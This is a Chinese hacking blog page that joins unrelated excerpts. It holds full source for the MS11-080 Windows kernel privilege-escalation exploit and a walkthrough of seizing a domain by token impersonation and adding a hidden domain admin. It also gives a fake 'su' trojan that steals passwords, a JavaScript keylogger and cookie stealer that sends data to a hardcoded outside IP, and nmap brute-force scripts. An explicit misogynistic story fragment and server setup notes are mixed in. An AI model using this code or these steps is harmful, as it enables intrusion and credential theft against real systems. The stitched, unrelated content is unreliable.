Chinadu's Blog

/*

* MS11-080 Afd.sys Privilege Escalation Exploit

* 来源：Matteo Memelli，[url]http://www.exploit-db.com/exploits/18176/[/url]

* 改编：KiDebug，[email]Google@pku.edu.cn[/email]

* 编译：VC6.0

* 测试环境：原版Windows XP SP3，Windows 2003 SP2，普通用户

*/

#include <stdio.h>

#include <Winsock2.h>

#include <winbase.h>

#include <windows.h>

#pragma comment (lib, "ws2_32.lib")

typedef struct _RTL_PROCESS_MODULE_INFORMATION {

HANDLE Section; // Not filled in

PVOID MappedBase;

PVOID ImageBase;

ULONG ImageSize;

ULONG Flags;

USHORT LoadOrderIndex;

USHORT InitOrderIndex;

USHORT LoadCount;

USHORT OffsetToFileName;

UCHAR FullPathName[ 256 ];

} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

typedef struct _RTL_PROCESS_MODULES {

ULONG NumberOfModules;

RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];

} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );

typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );

typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );

NtQueryIntervalProfile_ NtQueryIntervalProfile;

NtAllocateVirtualMemory_ NtAllocateVirtualMemory;

NtQuerySystemInformation_ NtQuerySystemInformation;

ULONG PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;

void _declspec(naked) ShellCode()

{

__asm

{

pushad

pushfd

mov esi,PsReferencePrimaryToken

FindTokenOffset:

lodsb

cmp al, 8Dh;

jnz FindTokenOffset

mov edi,[esi+1]

mov esi,PsInitialSystemProcess

mov esi,[esi]

push fs:[124h]

mov eax,PsGetThreadProcess

call eax

add esi, edi

add edi, eax

movsd

popfd

popad

ret

}

}

void main(int argc, char **argv)

{

if (argc != 3)

{

printf("--------------------------------------\n");

printf("Usage : ms11-080.exe cmd.exe Command \n");

exit(-1);

}

HMODULE ntdll = GetModuleHandle( "ntdll.dll" );

NtQueryIntervalProfile = (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );

NtAllocateVirtualMemory = (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );

NtQuerySystemInformation = ( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );

if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )

return;

ULONG BaseAddress = 1 , RegionSize = 0x1000, status;

status = NtAllocateVirtualMemory( (HANDLE)0xFFFFFFFF, (PVOID*)&BaseAddress, 0, &RegionSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE );

if ( status )

return;

//取ntoskrnl的信息，只要调用一次就行

ULONG NtoskrnlBase;

RTL_PROCESS_MODULES module;

status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11

if ( status != 0xC0000004 ) //STATUS_INFO_LENGTH_MISMATCH

return;

NtoskrnlBase = (ULONG)module.Modules[0].ImageBase;

//把ntoskrnl.exe加载进来

HMODULE ntoskrnl;

ntoskrnl = LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );

if ( ntoskrnl == NULL )

return;

//计算实际地址

WriteToHalDispatchTable = (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; //需要覆盖的地址

PsInitialSystemProcess = (ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;

PsReferencePrimaryToken = (ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;

PsGetThreadProcess = (ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;

//以下代码就各显神通了

if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )

return;

memset((PVOID)0x02070000,0x90,0x20000);

memcpy((PVOID)0x02080000,ShellCode,100);

WSADATA ws;

SOCKET tcp_socket;

struct sockaddr_in peer;

ULONG dwReturnSize;

WSAStartup(0x0202,&ws);

peer.sin_family = AF_INET;

peer.sin_port = htons(4455);

peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );

tcp_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )

{

//printf("connect error\n");

}

UCHAR buf1[26]= "\x41\x41\x41\x41\x42\x42\x42\x42\x00\x00\x00\x00\x44\x44\x44\x44\x01\x00\x00\x00\xe8\x00\x34\xf0\x00";

memset((PVOID)0x1000,0x45,0x108);

memcpy((PVOID)0x1000,buf1,25);

if(!DeviceIoControl((HANDLE)tcp_socket,0x000120bb, (PVOID)0x1004, 0x108, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))

{

//printf("error=%d\n", GetLastError());

}

//触发，弹出SYSTEM的CMD

NtQueryIntervalProfile( 2, &status );

printf("[>] ms11-080 Exploit\n");

printf("[>] by:Mer4en7y@90sec.org\n");

SECURITY_ATTRIBUTES sa;

HANDLE hWrite,hRead;

STARTUPINFO si;

PROCESS_INFORMATION pi;

char buf[4096];

DWORD dwReadBytes;

char lpcmd[256]={0};

ZeroMemory(buf,4096);

sa.bInheritHandle = TRUE;

sa.lpSecurityDescriptor = NULL;

sa.nLength = sizeof(SECURITY_ATTRIBUTES);

if(!CreatePipe(&hRead,&hWrite,&sa,0))

{

printf("[>] create pipe error\n");

}

si.cb = sizeof(STARTUPINFO);

GetStartupInfo(&si);

si.hStdError = hWrite;

si.hStdOutput = hWrite;

si.wShowWindow = SW_HIDE;

si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;

strcat(lpcmd,"/c ");

strcat(lpcmd,argv[2]);

if(!CreateProcess(argv[1],lpcmd,NULL,NULL,TRUE,0,NULL,NULL,&si,&pi))

{

printf("[>] create porcess error\n");

}

CloseHandle(hWrite);

while(dwReadBytes!=0)

{

WriteFile(hWrite,"test1",6,&dwReadBytes,NULL);

ZeroMemory(buf,4096);

ReadFile(hRead,buf,4096,&dwReadBytes,NULL);

printf("%s\n",buf);

}

return;

}

Get administrator rights on a workstation which is on a windows domain using whatever method you can find. (exploit, stolen password, smbrelay, phishing, etc). Look for the domain server. There are a variety of ways to do this. You can arp -a to find active IP’s or ping scan the network and then use the nbtstat tool to look for the right domain controller identifier or an obvious hostname.

You can also browse the network neighborhood or use the net view command.

Aquiring and cracking the hashes of your target is generally useful as well.

Enumerate group membership so you know who to target.

Get the usernames in the local administrators group:

C:WINDOWSsystem32>net localgroup administrators
net localgroup administrators
Alias name  administrators
Comment     Administrators have complete and unrestricted access to the computer/domain

Members
--------------------------------------
Administrator
BLACKHATDomain Admins
hacked
local_valsmith
root
The command completed successfully.

Enumerate the domain admins

C:WINDOWSsystem32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain blackhat.com.

Group name   Domain Admins
Comment      Designated administrators of the domain

Members

---------------------------------------------------
admin_valsmith      Administrator
The command completed successfully.

So admin_valsmith is our target domain admin. Lets say the workstation we hacked is on 172.16.1.10. We now need to find out of there are any security tokens we can access.

c:incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 list_tokens -u
[*] Attempting to establish new connection to \172.16.1.10IPC$
[*] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-FC12020A7EED}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Listing unique users found...

Delegation Tokens Available
==========================================
NT AUTHORITYLOCAL SERVICE
NT AUTHORITYNETWORK SERVICE
NT AUTHORITYSYSTEM
XPCLIENTlocal_valsmith

Impersonation Tokens Available
==========================================
BLACKHATadmin_valsmith
NT AUTHORITYANONYMOUS LOGON

[*] Service shutdown detected. Service executable file deleted
[*] Deleting service

So admin_valsmith is our target domain administrator and an impersonation token is available to us!

The above command assumes we have cracked the hash of the local admin and retrieved the password. This will connect to IPC$ share on the target and list any tokens that are available.

Next we will utilize this token to gain domain admin rights:

C:incognitoincognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 execute -c "blackhatadmin_valsmith" cmd

[*] Attempting to establish new connection to \172.16.1.10IPC$
[+] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-9047A294CE6D}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Searching for availability of requested token
[+] Requested token found
[-] No Delegation token available
[*] Attempting to create new child process and communicate via anonymous pipe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>whoami
whoami
admin_valsmith

So we now have a shell with the rights of the domain administrator. We will add an account to the domain controller to demonstrate our access:

C:net user hacked 0h3ck3d! /add /domain
net user hacked 0h3cked! /add /domain
The request will be processed at a domain controller for domain blackhat.com.

The command completed successfully.

Now we want to add our account to the domain admin group. NOTE: often you don’t want to add an account, especially one named hacked as it is likely to be discovered by the admins.

C:net group "domain admins" hacked /add /domain
net group "domain admins" hacked /add /domain
The reuqest will be processed at a domain controller for domain blackhat.com

The command completed successfully.

At this point we have control over the domain and can likely log into any workstation which is on the domain.

Some further related reading:

One token to Rule them All: Post-Exploitation Fun in Windows Environments

Security implications of windows access tokens

Meta-Post_Exploitation.pdf

SSHscan – Scanning ports through SSH Port Forwarding

SSHscan.py will allow you to scan a internal network through a SSH with port forwarding enabled. The tool allows to create a port forward in localhost for every open port detected in the internal network range.

This tool is not one that can be used in every engagement but when you have the opportunity and the need it will came handy.

The tool has been included in the edgeSSH kit, where we will include all the scripts related with SSH, at the moment only bruteSSH, a SSH login bruteforcer and scanSSH are included in the kit.

You can download the code here: http//code.google.com/p/edgessh

Command line options:        -h: target host       -u: username       -p: password       -l: targets lists to scan       -t: threads       --remote-host: host to scan       --remote-ports: port list to scan       --default-ports: scan default ports       --all-ports: scan all 65535 ports       --keep-tunnels: Forward all open ports

Examples:

    scanssh.py -h 192.168.1.55 -u root -p passowrd -t list.txt    scanssh.py -h 192.168.1.55 -u root -p password --remote-host 127.0.0.1 --remote-ports 80,443    scanssh.py -h 192.168.1.55 -u root -p password --remote-host 127.0.0.1 --default-ports

[source: http://edge-security.blogspot.com/2011/06/scanning-ports-through-ssh-port.html]

来自：http://www.007hack.com/?p=635

Web目录下有一些文件不允许匿名访问（可以使用Tomcat、Apache、nginx等进行配制，来实现此效果），如下图：

可以使用以下代码+字典破解，运行结果如下：

主要代码如下（附件中有完整代码，仅供学习！请勿非法使用！）：

点击下载：Crack_pass.rar

"喂，我明天去堕胎。”
“嗯。”
“不要你陪我。”
“不会，别打扰我。”
挂了电话，耳边仍然回荡着苏枂充满诱惑力的声音，我看了看手机，已经11点了。明天苏枂就去堕胎了，而今晚的我却和别的女人在一起。昏暗的灯光，迷人的香水，光滑的皮肤，还有充满力量的撞击。直到我倾泻而出，我忽然想到，明天苏枂真的要去堕胎了，而她肚子里的孩子，是我的。

苏枂是个BIAO子，认识她的每一个人都知道这一点。第一次见苏枂是在一次朋友聚会中，当苏枂穿着一身粉红色的运动装推门而入的时候，我的眼睛都看直了。兄弟鸭子悄悄捅了捅我，在我耳边低声说道：“别看了，那是个BIAO子，外表看着单纯，实际上只要给钱，什么都做。”我无法形容当时我心里的巨大落差，这么清纯漂亮的女孩居然是个BIAO子，看来女人真的不能光从外表判断，如果鸭子不说，我还以为苏枂是个纯情的CN。我问鸭子：“你上过她么？”鸭子说：“当然没有，我从来没有花钱艹B的习惯。其实那个BIAO子不是那种洗头房里的BIAO子，她今年大三，是那种楼FENG一样的女人，你需要了，联系她，给她钱，然后她就来满足你。”我说：“你怎么知道的这么清楚？”鸭子说：“她的好朋友是我以前的女人。”

我看着苏枂，她走到桌前坐下，然后和我的一个朋友打招呼。苏枂笑起来很美，牙齿很白，嘴唇很红，苏枂笑起来眼睛会弯成好看的弧度，长长地睫毛，还有胸前那若有若无的沟。我点了根烟，感叹道：“这么美的女人，居然是一个BIAO子。”

吃饭的时候，我们挨个碰杯，碰到苏枂时，我说：“美女，看你好眼熟，好像在哪见过你，来，交个朋友。”苏枂脸红了，在我眼里这却是故作害羞。和我喝了酒之后，在接下来的时间里，苏枂不时的偷偷看我。我知道她心里怎么想的，她肯定以为我是以前花钱CAO过她的男人中的一个，而她现在记不起来了。我笑了笑，看着她。她立马低下头。“BIAO子。”我在心里这样说道。
阅读全文...

结 合这两点，由于php本身的一种运行方式是以apache的mod方式在apahe进程中存在的，所以对于php来说，他的自身进程也就是apache的 进程，所有apache原来在root下打开的文件描述符，他都能操作。于是乎，原有修补完毕的漏洞，经过PHP新功能的妙手回春，又重现江湖了。

那么究竟如何利用这个漏洞呢？在之前的那篇文章里， 我曾经给出了一个例子，就是直接复用当前连接80端口的socket，生成一个交互性shell。当时我没有给出自动化查找当前连接80端口socket 的实现，但实际上，在写文章的时候，我就私底下给出过一个利用shell工具自动化查找当前socket连接的方法：

但当时的例子已经不能在apache补丁后使用了，因为他用到了子进程再重定向输入输出来实现端口复用。而现在由于不能使用子进程来做这些事情，因此所有难点就集中在如何自动化的查找当前连接的socket上。

仔细看上面那些代码的原理，不过是使用netstat来进行当前系统中socket信息的输出比对。既然如此，我只要手工实现netstat的功能即可。那netstat又是如何实现的呢？
阅读全文...

open_basedir可将用户访问文件的活动范围限制在指定的区域，通常是其家目录的路径，也可用符号"."来代表当前目录。注意用open_basedir指定的限制实际上是前缀,而不是目录名。
举例来说: 若"open_basedir = /dir/user", 那么目录 "/dir/user" 和 "/dir/other"都是可以访问的。所以如果要将访问限制在仅为指定的目录，请用斜线结束路径名。
open_basedir也可以同时设置多个目录,在Windows中用分号分隔目录,在任何其它系统中用冒号分隔目录。当其作用于Apache模块时，父目录中的open_basedir路径自动被继承。

Apache+PHP配置方法有三种：
方法一：在php.ini里配置
open_basedir = .:/tmp/

方法二：在Apache配置的VirtualHost里设置(httpd-vhosts.conf)
php_admin_value open_basedir .:/tmp/

方法三：在Apache配置的Direcotry里设置
php_admin_value open_basedir .:/tmp/

阅读全文...

#./vmware-install.pl
bash:./vmware-install.pl :/usr/bin/perl:bad interpreter:No such file or directory.
如果出现这个提示，则表明系统没有安装Perl环境，可以使用如下命令来提供Perl支持：
#yum groupinstall "Perl Support"

Searching for GCC...
The path "" is not valid path to the gcc binary.
Would you like to change it? [yes]
如果出现这个就表明gcc没有安装

yum install gcc gcc-c++ automake make
将编译环境一次装好
阅读全文...

/*

/*

* kpr-fakesu.c V0.9beta167

* by koper

*

* Setting up:

* admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c

* admin@host:~$ mv .su /var/tmp/.su

* admin@host:~$ cp .bash_profile .wgetrc

* admin@host:~$ echo "alias su=/var/tmp/.su">>.bash_profile

* admin@host:~$ logout

* *** LOGIN ***

* admin@host:~$ su

* Password:

* su: Authentication failure

* Sorry.

* admin@host:~$ su

* Password:

* root@host:~# logout

* admin@host:~$ cat /var/tmp/.pwds

* root:dupcia17

* admin@host:~$

*

* /bin/su sends various failure information depending on the OS ver.

* Please modify the source to make it "fit" <img src="http://www.4shell.org/wp-content/uploads/images/2011/11/1323384Sm.gif" alt=";)">

*

*/

#include

#include

#include

main(int argc, char *argv[]){

FILE *fp;

char *user;

char *pass;

char filex[100];

char clean[100];

sprintf(filex,"/var/tmp/.pwds");

sprintf(clean,"rm -rf /var/tmp/.su;mv -f /home/test/.wgetrc /home/test/.bash_profile");

if(argc==1) user="root";

if(argc==2) user=argv[1];

if(argc>2){

if(strcmp(argv[1], "-l")==0)

user=argv[2];

else user=argv[1];}

fprintf(stdout,"assword: ");

pass=getpass ("");

system("sleep 3");

fprintf(stdout,"su: Authentication failurenSorry.n");

if ((fp=fopen(filex,"w")) != NULL)

{

fprintf(fp, "%s:%sn", user, pass);

fclose(fp);

}

system(clean);

system("rm -rf /var/tmp/.su; ln -s /bin/su /var/tmp/.su");

}

以下三个都是比较经典的backdoor：

阅读全文...

国内:www.cmd5.com(收费，国内最强大的)

国内：http://www.md5.com.cn/ (有特色，还没怎么用)

国内：www.xmd5.com(还不错)

国外：http://www.c0llision.net/webcrack.php(免费，还不错)

国外：http://hashkiller.com/ (免费，相当强大!!!)

国外：http://ops.conus.info/(免费，少有的oracle hash在线破解网站)

以上几个网站在我使用过程当中查询md5我感觉hashkiller和cmd5最强大，其实cmd5更强些，但是hashkiller是完全免费 的！所以hashkiller=cmd5>xmd5>collision，从测试来看，就md5和md5+salt来说，cmd5.com后 台破解比它的查询强大。

值得一提的是，很多只能靠cmd5.com后台破的md5密码能靠hashkiller网站直接查出来，只有少部分密码不行。可以先用 hashkiller和collision查询，再用cmd5和xmd5查询，然后再考虑使用cmd5后台破解功能，如果还破不出来那可能就真的破不出来 了。其实这五个网站也是一种检验自己密码强度的最佳方法，看看自己的密码是否在这数万亿的字典当中。另外需要补充的是，collision支持批量查 询：）

var keys=''; //储存键盘鼠标记录

var hacker = 'http://218.6.132.15:8080/xss.php';

var Url = window.location;

var Domain = document.domain;

var Cookie = document.cookie;

 

document.onkeypress = function(e) { //劫持键盘消息

get = window.event ? event:e;

key = get.keyCode ? get.keyCode : get.charCode;

switch(key){

case 32 : key = '[Space]';break;

case 13 : key = '[Enter]';break;

case 8 : key = '[BackSpace]';break;

default :

key = String.fromCharCode(key);

keys += key;

}

}

 

window.onload = function(){ //窗口加载后发送cookie

setInterval(function(){

var Cookie_t = document.cookie;

if(Cookie_t != Cookie){

Cookie = Cookie_t;

}

SendData(hacker + '?m=c&c=' + Cookie);

},2000); //每2秒检测一次cookie,如果变化，就重新发送

}

document.onmousedown = function(e) {

get = window.event ? event : e; //创建事件对象

var mousekey = get.button; //获取鼠标键代码

switch(mousekey) {//1 鼠标左键 2 鼠标右键 4 滚动键

case 1 :

mousekey = '[Left Mouse Clik]';break;

case 2 :

mousekey = '[Right Mouse Clik]';break;

case 4 :

mousekey = '[Roll Mouse Clik]';break;

default :

mousekey = '[Unknown Mouse Key]';

}

keys += mousekey;

}

function SendData(src){

new Image().src = src; //建立图片对象用于发射数据

}

 

setInterval(function(){ SendData(hacker + '?m=k&c=' + keys);keys = ''; },5000); //每五秒发送一次键盘记录，初始化变量

官方说明：http://nmap.org/nsedoc/

选了些自我感觉特别实用的：

ms-sql-brute

nmap -sV –script=ms-sql-brute <target>

ms-sql-xp-cmdshell

Example Usage：

nmap -sV –script=ms-sql-xp-cmdshell <target>
Script Output

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| mssql-xp-cmdshell:
|   Command: ipconfig /all; User: sa
|   output
|
|   Windows IP Configuration
|
|      Host Name . . . . . . . . . . . . : EDUSRV011
|      Primary Dns Suffix  . . . . . . . : cqure.net
|      Node Type . . . . . . . . . . . . : Unknown
|      IP Routing Enabled. . . . . . . . : No
|      WINS Proxy Enabled. . . . . . . . : No
|      DNS Suffix Search List. . . . . . : cqure.net
|
|   Ethernet adapter Local Area Connection 3:
|
|      Connection-specific DNS Suffix  . :
|      Description . . . . . . . . . . . : AMD PCNET Family PCI Ethernet Adapter #2
|      Physical Address. . . . . . . . . : 08-00-DE-AD-C0-DE
|      DHCP Enabled. . . . . . . . . . . : Yes
|      Autoconfiguration Enabled . . . . : Yes
|      IP Address. . . . . . . . . . . . : 192.168.56.3
|      Subnet Mask . . . . . . . . . . . : 255.255.255.0
|      Default Gateway . . . . . . . . . :
|      DHCP Server . . . . . . . . . . . : 192.168.56.2
|      Lease Obtained. . . . . . . . . . : den 21 mars 2010 00:12:10
|      Lease Expires . . . . . . . . . . : den 21 mars 2010 01:12:10
|

mysql-brute

Example Usage

nmap -sV –script=mysql-brute <target>

Script Output

阅读全文...